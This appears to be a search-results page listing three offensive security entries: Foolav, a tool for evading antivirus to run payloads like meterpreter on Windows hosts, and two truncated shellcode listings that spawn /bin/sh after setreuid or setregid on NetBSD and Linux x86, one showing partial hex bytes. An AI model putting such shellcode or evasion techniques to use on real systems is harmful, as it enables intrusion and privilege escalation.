3 matches found
Foolav - Pentest Tool For Antivirus Evasion and Running Arbitrary Payload on Target Wintel Host
Executable compiled with this code is useful during penetration tests where there is a need to execute some payload meterpreter maybe? while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files: binary executable and payload file...
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes. Shellcode exploit for netbsdx86 platform / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / includ...
linux/x86 execve /bin/sh setreuid12,12 50 bytes
linux/x86 execve /bin/sh setreuid12,12 50 bytes. Shellcode exploit for linx86 platform / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %a...